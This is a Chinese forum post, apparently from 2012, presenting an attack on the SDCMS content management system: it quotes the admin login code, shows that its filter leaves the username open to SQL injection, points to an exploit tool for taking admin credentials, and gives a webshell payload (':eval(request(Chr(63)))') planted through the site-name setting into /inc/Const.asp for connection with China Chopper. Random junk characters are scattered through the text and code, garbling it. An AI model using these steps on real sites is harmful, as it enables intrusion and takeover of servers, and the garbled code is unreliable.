作者:T00LS 鬼哥; h" v7 Q7 b+ d z
漏洞文件:后台目录/index.asp
( ]/ K1 I8 i: J. N7 n# f' F' u* h7 c/ x+ h3 ]1 S( a' {' B- Q' z$ f
Sub Check7 d/ Z/ G8 W3 s2 c8 }& t1 ]# y
Dim username,password,code,getcode,Rs
5 A7 J% j8 h3 y- y+ T+ u. U IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
: D% k6 {7 R0 X- s5 l9 { username=FilterText(Trim(Request.Form("username")),1)& J+ A( w/ @. ]5 [) X
password=FilterText(Trim(Request.Form("password")),1)# u; c5 j9 Z$ R
code=Trim(Request.Form("yzm"))
& O |+ o7 v& h3 r* j+ { getcode=Session("SDCMSCode")
4 q& ]0 S% ?( q7 O$ i8 v8 p; Q IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died& y: d4 ]9 L7 X8 _3 q
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
4 O/ W0 ~$ s# V ^' z# ? IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied9 U7 K% ]* y1 e7 y
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
" I( J/ h2 w3 U8 u IF username="" or password="" Then
; [* Y. W ]1 ^6 _. d$ g Echo "用户名或密码不能为空"ied
1 M) \. G& n. n2 A Else
2 n- w# i Z; b& b# L Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")3 E2 Q( r9 S: w& J0 k
IF Rs.Eof Then# J" [" }! V4 k; s2 u4 }/ q% n; _
AddLog username,GetIp,"登录失败",1( |0 q$ h( T7 L2 `
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
# Q" y0 `* W9 |* W# ? Else t/ `/ k0 M% L: M2 R! }% _) p$ H4 U( |
Add_Cookies "sdcms_id",Rs(0)
: m0 S# @& ]* Y5 c4 ` Add_Cookies "sdcms_name",username
! O1 a: ?. S A" Q Add_Cookies "sdcms_pwd",Rs(2)$ E; L3 E- B% l1 g8 D* a
Add_Cookies "sdcms_admin",Rs(3)
- i# x, g* s6 ]$ h9 ^ Add_Cookies "sdcms_alllever",Rs(4)
9 B3 i1 ^+ K0 b! ~0 u: y& e Add_Cookies "sdcms_infolever",Rs(5)
1 @9 a4 g1 i- m: s Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
. |/ w2 S5 C% k" v2 F/ r5 K, Z AddLog username,GetIp,"登录成功",1
; K! K# L2 u0 e* j& e1 ~8 I! R '自动删除30天前的Log记录
3 l3 n1 K/ o0 i: L3 r+ Z IF Sdcms_DataType Then: {% y& t0 q' v: o& S2 o/ w5 t
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
% z, A- _" i0 B( j+ b Else2 U% `, a4 B+ V# L0 A0 U5 ?
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")) v& e1 x- A# I8 [, q
End IF
8 C9 g* C1 e# k3 F {. j; L Go("sdcms_index.asp")
]# `4 v0 F* j- M9 w9 L4 e End IF' M* P( j9 n( k, B6 v- Q/ H
Rs.Close" m; `/ D, e3 [; e, C& E r
Set Rs=Nothing
7 h* a9 _' N* @& m/ D; H! F End IF
! k0 T6 I$ d+ F6 tEnd Sub
( S; b/ l- U0 R# P; b0 o& s
L+ ^8 m' o, e j- j’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
1 a# t8 N: Y2 M
6 U/ N! z; v2 Z* r C0 AFunction FilterText(ByVal t0,ByVal t1)
+ j) Y& Z1 r! B* @( @" S+ n# f IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
) o/ [* m' G8 @% c T- M1 T t0=Trim(t0)
/ O0 ]* j* a4 x6 w& l% k" k Select Case t1" O. ^& ]! C0 `; r
Case "1". M9 N/ U: [$ X0 }& K4 a
t0=Replace(t0,Chr(32),"")+ c* D" A5 k$ w2 [
t0=Replace(t0,Chr(13),"")
4 R, \. T- ~6 \; m! J3 e t0=Replace(t0,Chr(10)&Chr(10),"")
* T9 U1 z' {! m- U$ \$ F- Q t0=Replace(t0,Chr(10),"")8 Q6 V5 I) T, a o5 q- C6 [6 q
Case "2"5 f2 e O0 F# \- A( C- O
t0=Replace(t0,Chr(8),"")'回格/ [3 M; C" V; }9 m p2 B
t0=Replace(t0,Chr(9),"")'tab(水平制表符): o: n0 x/ |" ^9 a# h
t0=Replace(t0,Chr(10),"")'换行
: t3 N- q* L3 u t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
/ l% @# J- g, H3 u$ z t0=Replace(t0,Chr(12),"")'换页# G. r& T8 |# Y+ k$ B
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
. j) x5 J0 o5 K. @) k/ ?, `% q t0=Replace(t0,Chr(22),"")
) S+ p J9 H+ P& a" V t0=Replace(t0,Chr(32),"")'空格 SPACE
+ }& \8 G8 t0 j9 c8 \- k t0=Replace(t0,Chr(33),"")'!) d$ p% R- j: M C
t0=Replace(t0,Chr(34),"")'"
3 w+ J& P0 `+ `9 O' s" N t0=Replace(t0,Chr(35),"")'#+ T4 C( t9 F6 l5 J ]" E
t0=Replace(t0,Chr(36),"")'$" E8 Z" C6 k" H: T2 p1 v6 C; l
t0=Replace(t0,Chr(37),"")'% b( Q, C# h# p$ k7 C
t0=Replace(t0,Chr(38),"")'&
5 y9 R" q! ~- i2 y+ D2 v t0=Replace(t0,Chr(39),"")'': {/ C D2 u9 x# F |9 v" N$ n5 y
t0=Replace(t0,Chr(40),"")'(
" s3 T8 x. s+ J4 R# V, e$ V% u7 ~ t0=Replace(t0,Chr(41),"")')5 |7 z0 L2 h2 U
t0=Replace(t0,Chr(42),"")'*: C) L. }/ `. M
t0=Replace(t0,Chr(43),"")'+
, \2 f8 {5 N7 T% g; k' z2 t9 F; S t0=Replace(t0,Chr(44),"")',
$ H0 ^! o9 b0 | o4 g; @ t0=Replace(t0,Chr(45),"")'- h% w4 ?5 }7 @- o
t0=Replace(t0,Chr(46),"")'.
/ Z) Y) ~# ~+ ^) m: q+ l8 E t0=Replace(t0,Chr(47),"")'/0 M; X8 j. K7 P9 V5 a0 F2 N6 E
t0=Replace(t0,Chr(58),"")':
+ _. Z, C* q. k; S5 z, b t0=Replace(t0,Chr(59),"")';
# `( t, M. ~$ D1 ^, D! G6 | t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>0 E; @! m: w. d' F
t0=Replace(t0,Chr(63),"")'?
% B" E0 J9 I* f$ o) T* c8 D# U9 C3 F t0=Replace(t0,Chr(64),"")'@
! V: Z! v4 _* U t0=Replace(t0,Chr(91),"")'\
( Y& {' ?$ |% F- a t0=Replace(t0,Chr(92),"")'\- Y% Q8 q' o: u; `3 v q& T
t0=Replace(t0,Chr(93),"")']5 i& Q+ p- f% E8 b
t0=Replace(t0,Chr(94),"")'^2 O! `' S/ r4 R9 o; h
t0=Replace(t0,Chr(95),"")'_' k" @ c1 I* d4 T1 j
t0=Replace(t0,Chr(96),"")'`3 }) \8 h6 X. M& U3 U8 p9 A: C
t0=Replace(t0,Chr(123),"")'{2 _4 P" i# c$ _5 u
t0=Replace(t0,Chr(124),"")'|- d7 N5 s+ ?- I( r2 C2 @0 Y8 y
t0=Replace(t0,Chr(125),"")'}
/ O) }& Y7 z2 G) ]- c t0=Replace(t0,Chr(126),"")'~2 i: C- J- j) v
Case Else. v9 A( d2 e1 v3 }$ t. p$ q
t0=Replace(t0, "&", "&")5 I$ q( ^5 V* @( V
t0=Replace(t0, "'", "'")7 p6 H+ m: y# [$ D+ i- X9 t
t0=Replace(t0, """", """)1 H% k2 G5 h$ J
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
3 w" w8 m6 t5 U/ }/ \+ { End Select/ \. J j6 I3 ?; m8 O2 j4 _/ s3 l
IF Instr(Lcase(t0),"expression")>0 Then
: S% x: G3 o7 K3 G( ~5 a, T( Y t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
: ?+ G2 j- a; l+ G End If. b; z0 y# s% v9 ^2 m* A/ N+ L& s \
FilterText=t04 M8 }" ^ R0 F$ l8 x0 h# i3 h2 m; k
End Function1 K. b0 d' @" O. W! C; W
% r) v1 L$ V9 j6 v+ E看到没。直接参数是1 只过滤
7 V+ t* {8 W# P b* v/ U t0=Replace(t0,Chr(32)," ")
1 m2 U+ K z! z t0=Replace(t0,Chr(13),"")
; p8 _% S" \: j5 a7 q1 `/ B& F t0=Replace(t0,Chr(10)&Chr(10),"
2 c9 l$ S% E$ g")- `/ n, |+ ~- I0 K
t0=Replace(t0,Chr(10),"
$ H2 D6 C+ @6 }% |, e")" e" l6 P+ A" a7 m6 [. A& K; G
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!3 M- X) s9 d2 F( u% V0 ]5 \
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
1 M" j3 b/ `! N
/ D& g/ S4 W9 k, ~! F. q测试:. R( X9 u+ O3 ?" z2 g, g' s& Q
6 `2 c4 a, U" c
% D& C9 ~! B7 q现在输入工具上验证码,然后点OK
+ x7 b" u! }4 R+ D K" A: j6 M- H/ x$ J R
' Z0 Z) G/ O3 W5 N [看到我们直接进入后台管理界面了,呵呵!2 B7 X% R: Y& y, w; M/ |
& E' T6 K: X5 g. Z
7 M0 Z: G1 z6 H# f2 C, c c& v' B: Y$ B* Q4 d/ p4 V
这样直接进入后台了。。。。& T; J! i6 q7 n
n" E& T* ?6 F& | 4 M* K5 P: c( A- U! @: b- ~3 `
1 S; n2 a1 c7 c/ {) H; FSDCMS提权:
3 z/ }4 ]; J3 h+ y
I% Y+ i$ C; ~- ?- y. e7 w方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?6 h( {/ D* F( l% n/ }
3 U, x4 V% e3 U' g' F% f: w
* T4 x' P( s, f. Z! E4 S7 j- w7 `
OK,现在用菜刀连接下!
; H( J$ Q5 U/ J6 c; a/ ?% O$ b3 [# ~" B! z+ t; h0 d9 t
6 s' ~1 M Y- d1 u
T% ^8 x$ q/ N [: `2 \. |
% Q, B8 d- N; N/ W$ C
" {! @9 p+ T {% U% u9 C |
发表于 2012-11-9 20:57:02
收藏
分享
支持
反对